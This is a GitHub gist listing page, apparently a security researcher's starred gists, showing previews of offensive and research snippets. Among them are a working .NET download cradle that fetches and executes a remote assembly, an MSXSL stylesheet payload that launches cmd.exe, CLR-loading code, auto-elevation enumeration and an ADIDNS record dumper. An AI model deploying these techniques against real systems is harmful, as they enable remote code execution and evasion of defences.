Skip to content

Instantly share code, notes, and snippets.

🎯
Infosec

Franci Šacer fsacer

🎯
Infosec
Block or report user

Report or block fsacer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@3xocyte
3xocyte / adidns_records.py
Last active Aug 9, 2019
get /etc/hosts entries from ADIDNS
View adidns_records.py
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
View windows-toolkit.md

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
@caseysmithrc
caseysmithrc / example.cs
Last active Mar 9, 2019
Loads .NET Assembly into script host from current path
View example.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@Evilcry
Evilcry / findautoelevate.ps1
Created Jul 8, 2018
Enumerate executables with auto-elevation enabled
View findautoelevate.ps1
# Find Autoelevate executables
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true"
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true"
@Neo23x0
Neo23x0 / fp-hashes.py
Last active May 19, 2019
Typical False Positive Hashes
View fp-hashes.py
# This GIST has been transformed into a Git repository and does not receive updates anymore
#
# Please visit the github repo to get a current list
# https://github.com/Neo23x0/ti-falsepositives/
# Hashes that are often included in IOC lists but are false positives
HASH_WHITELIST = [
# Empty file
'd41d8cd98f00b204e9800998ecf8427e',
'da39a3ee5e6b4b0d3255bfef95601890afd80709',
@cobbr
cobbr / DotnetAssemblyDownloadCradle.cs
Created Jun 20, 2018
A download cradle for .NET assemblies.
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@xpn
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@caseysmithrc
caseysmithrc / minimalist.xml
Last active Nov 4, 2018
MSXSL Single File Payload
View minimalist.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
@LiveOverflow
LiveOverflow / software_update.sage
Created Mar 16, 2018
34C3 CTF software_update (crypto)
View software_update.sage
import sage.all
import hashlib
# part1 - https://www.youtube.com/watch?v=Vgdhlh6evjI
# part2 - https://www.youtube.com/watch?v=EOlddNofKxo
# prepare a table of bits
def bits_of(x):
bits = []
for c in "{:08b}".format(x):
You can’t perform that action at this time.